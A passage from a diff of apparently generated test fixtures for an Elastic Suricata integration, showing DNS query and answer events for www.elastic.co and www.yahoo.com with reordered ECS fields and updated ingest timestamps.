"{\"timestamp\":\"2019-08-22T23:48:48.902685+0000\",\"flow_id\":2130691028471842,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":41979,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":4210,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"AAAA\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":299,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0200:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0400:0000:0000:0000:0000:0729\"}],\"grouped\":{\"AAAA\":[\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"2a04:4e42:0200:0000:0000:0000:0000:0729\",\"2a04:4e42:0400:0000:0000:0000:0000:0729\"],\"CNAME\":[\"dualstack.r2.shared.global.fastly.net\"]}}}", "category": [ "network" @@ -630,9 +623,25 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.812Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.0.2.15" + ] + }, "destination": { "port": 53, "address": "10.0.2.3" @@ -648,27 +657,6 @@ "type": "query", "id": "28329" }, - "source": { - "port": 44773, - "address": "10.0.2.15", - "ip": "10.0.2.15" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.812Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.0.2.15" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -683,8 +671,13 @@ "flow_id": "814378410010223" } }, + "source": { + "port": 44773, + "address": "10.0.2.15", + "ip": "10.0.2.15" + }, "event": { - "ingested": "2021-12-09T13:45:26.597931Z", + "ingested": "2021-12-14T14:55:20.366677546Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.812655+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":44773,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":28329,\"rrname\":\"www.yahoo.com\",\"rrtype\":\"A\",\"tx_id\":0}}", "category": [ "network" @@ -694,9 +687,25 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.812Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.0.2.15" + ] + }, "destination": { "port": 53, "address": "10.0.2.3" @@ -712,27 +721,6 @@ "type": "query", "id": "7050" }, - "source": { - "port": 55246, - "address": "10.0.2.15", - "ip": "10.0.2.15" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.812Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.0.2.15" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -747,8 +735,13 @@ "flow_id": "1887239765714716" } }, + "source": { + "port": 55246, + "address": "10.0.2.15", + "ip": "10.0.2.15" + }, "event": { - "ingested": "2021-12-09T13:45:26.597936600Z", + "ingested": "2021-12-14T14:55:20.366677933Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.812828+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":55246,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":7050,\"rrname\":\"www.yahoo.com\",\"rrtype\":\"AAAA\",\"tx_id\":0}}", "category": [ "network" @@ -758,9 +751,25 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.846Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.0.2.3" + ] + }, "destination": { "port": 44773, "address": "10.0.2.15" @@ -787,27 +796,6 @@ }, "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.846Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -824,8 +812,13 @@ "flow_id": "814378410010223" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597942100Z", + "ingested": "2021-12-14T14:55:20.366678308Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.yahoo.com\",\"rrtype\":\"CNAME\",\"ttl\":1315,\"rdata\":\"atsv2-fp-shed.wg1.b.yahoo.com\"}}", "category": [ "network" @@ -835,9 +828,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.846Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "175.16.199.1", + "10.0.2.3" + ] + }, "destination": { "port": 44773, "address": "10.0.2.15" @@ -867,28 +877,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.846Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "175.16.199.1", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -905,8 +893,13 @@ "flow_id": "814378410010223" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597947500Z", + "ingested": "2021-12-14T14:55:20.366678822Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"175.16.199.1\"}}", "category": [ "network" @@ -916,42 +909,6 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" - } - }, - { - "destination": { - "port": 44773, - "address": "10.0.2.15" - }, - "dns": { - "response_code": "NOERROR", - "resolved_ip": [ - "175.16.199.1" - ], - "question": { - "top_level_domain": "com", - "subdomain": "atsv2-fp-shed.wg1.b", - "registered_domain": "yahoo.com" - }, - "answers": [ - { - "name": "atsv2-fp-shed.wg1.b.yahoo.com", - "data": "175.16.199.1", - "type": "A", - "ttl": 15 - } - ], - "id": "28329", - "header_flags": [ - "RD", - "RA" - ], - "type": "answer" - }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" }, "tags": [ "preserve_original_event" @@ -959,7 +916,9 @@ "network": { "protocol": "dns", "transport": "udp" - }, + } + }, + { "@timestamp": "2019-08-23T01:22:31.846Z", "ecs": { "version": "1.12.0" @@ -970,6 +929,35 @@ "10.0.2.3" ] }, + "destination": { + "port": 44773, + "address": "10.0.2.15" + }, + "dns": { + "response_code": "NOERROR", + "resolved_ip": [ + "175.16.199.1" + ], + "question": { + "top_level_domain": "com", + "subdomain": "atsv2-fp-shed.wg1.b", + "registered_domain": "yahoo.com" + }, + "answers": [ + { + "name": "atsv2-fp-shed.wg1.b.yahoo.com", + "data": "175.16.199.1", + "type": "A", + "ttl": 15 + } + ], + "id": "28329", + "header_flags": [ + "RD", + "RA" + ], + "type": "answer" + }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -986,8 +974,13 @@ "flow_id": "814378410010223" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597953900Z", + "ingested": "2021-12-14T14:55:20.366679169Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"175.16.199.1\"}}", "category": [ "network" @@ -997,9 +990,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.846Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "175.16.199.1", + "10.0.2.3" + ] + }, "destination": { "port": 44773, "address": "10.0.2.15" @@ -1029,28 +1039,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.846Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "175.16.199.1", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -1067,8 +1055,13 @@ "flow_id": "814378410010223" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597958900Z", + "ingested": "2021-12-14T14:55:20.366679520Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"175.16.199.1\"}}", "category": [ "network" @@ -1078,9 +1071,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.846Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "175.16.199.1", + "10.0.2.3" + ] + }, "destination": { "port": 44773, "address": "10.0.2.15" @@ -1110,28 +1120,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.846Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "175.16.199.1", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -1148,8 +1136,13 @@ "flow_id": "814378410010223" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597964700Z", + "ingested": "2021-12-14T14:55:20.366679867Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"175.16.199.1\"}}", "category": [ "network" @@ -1159,9 +1152,25 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.847Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.0.2.3" + ] + }, "destination": { "port": 55246, "address": "10.0.2.15" @@ -1188,27 +1197,6 @@ }, "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.847Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -1225,8 +1213,13 @@ "flow_id": "1887239765714716" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597969800Z", + "ingested": "2021-12-14T14:55:20.366680219Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.yahoo.com\",\"rrtype\":\"CNAME\",\"ttl\":1268,\"rdata\":\"atsv2-fp-shed.wg1.b.yahoo.com\"}}", "category": [ "network" @@ -1236,9 +1229,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.847Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "10.0.2.3" + ] + }, "destination": { "port": 55246, "address": "10.0.2.15" @@ -1268,28 +1278,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.847Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -1306,8 +1294,13 @@ "flow_id": "1887239765714716" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597975700Z", + "ingested": "2021-12-14T14:55:20.366680695Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}}", "category": [ "network" @@ -1317,9 +1310,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.847Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "10.0.2.3" + ] + }, "destination": { "port": 55246, "address": "10.0.2.15" @@ -1349,28 +1359,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.847Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -1387,8 +1375,13 @@ "flow_id": "1887239765714716" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597980400Z", + "ingested": "2021-12-14T14:55:20.366681050Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}}", "category": [ "network" @@ -1398,9 +1391,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.847Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "10.0.2.3" + ] + }, "destination": { "port": 55246, "address": "10.0.2.15" @@ -1430,28 +1440,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.847Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -1468,8 +1456,13 @@ "flow_id": "1887239765714716" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597986200Z", + "ingested": "2021-12-14T14:55:20.366681406Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}}", "category": [ "network" @@ -1479,9 +1472,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T01:22:31.847Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "10.0.2.3" + ] + }, "destination": { "port": 55246, "address": "10.0.2.15" @@ -1511,28 +1521,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T01:22:31.847Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -1549,8 +1537,13 @@ "flow_id": "1887239765714716" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.598007600Z", + "ingested": "2021-12-14T14:55:20.366681752Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}}", "category": [ "network" @@ -1560,9 +1553,25 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T02:03:36.578Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.0.2.15" + ] + }, "destination": { "port": 53, "address": "10.0.2.3" @@ -1578,27 +1587,6 @@ "type": "query", "id": "9104" }, - "source": { - "port": 48288, - "address": "10.0.2.15", - "ip": "10.0.2.15" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T02:03:36.578Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.0.2.15" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -1613,8 +1601,13 @@ "flow_id": "2181951993205289" } }, + "source": { + "port": 48288, + "address": "10.0.2.15", + "ip": "10.0.2.15" + }, "event": { - "ingested": "2021-12-09T13:45:26.598013Z", + "ingested": "2021-12-14T14:55:20.366682107Z", "original": "{\"timestamp\":\"2019-08-23T02:03:36.578089+0000\",\"flow_id\":2181951993205289,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":48288,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":9104,\"rrname\":\"www.elastic.co\",\"rrtype\":\"A\",\"tx_id\":0}}", "category": [ "network" @@ -1624,9 +1617,25 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T02:03:36.578Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.0.2.15" + ] + }, "destination": { "port": 53, "address": "10.0.2.3" @@ -1642,27 +1651,6 @@ "type": "query", "id": "12859" }, - "source": { - "port": 59203, - "address": "10.0.2.15", - "ip": "10.0.2.15" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T02:03:36.578Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.0.2.15" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -1677,8 +1665,13 @@ "flow_id": "928596784370390" } }, + "source": { + "port": 59203, + "address": "10.0.2.15", + "ip": "10.0.2.15" + }, "event": { - "ingested": "2021-12-09T13:45:26.598017400Z", + "ingested": "2021-12-14T14:55:20.366682466Z", "original": "{\"timestamp\":\"2019-08-23T02:03:36.578262+0000\",\"flow_id\":928596784370390,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":59203,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":12859,\"rrname\":\"www.elastic.co\",\"rrtype\":\"AAAA\",\"tx_id\":0}}", "category": [ "network" @@ -1688,9 +1681,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T02:03:36.619Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "175.16.199.1", + "10.0.2.3" + ] + }, "destination": { "port": 48288, "address": "10.0.2.15" @@ -1749,28 +1759,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T02:03:36.619Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "175.16.199.1", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -1785,8 +1773,13 @@ "flow_id": "2181951993205289" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.598022800Z", + "ingested": "2021-12-14T14:55:20.366682814Z", "original": "{\"timestamp\":\"2019-08-23T02:03:36.619381+0000\",\"flow_id\":2181951993205289,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":48288,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":9104,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"A\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":150,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"}]}}", "category": [ "network" @@ -1796,9 +1789,28 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T02:03:36.626Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "2a04:4e42:0200:0000:0000:0000:0000:0729", + "2a04:4e42:0400:0000:0000:0000:0000:0729", + "10.0.2.3" + ] + }, "destination": { "port": 59203, "address": "10.0.2.15" @@ -1857,30 +1869,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - 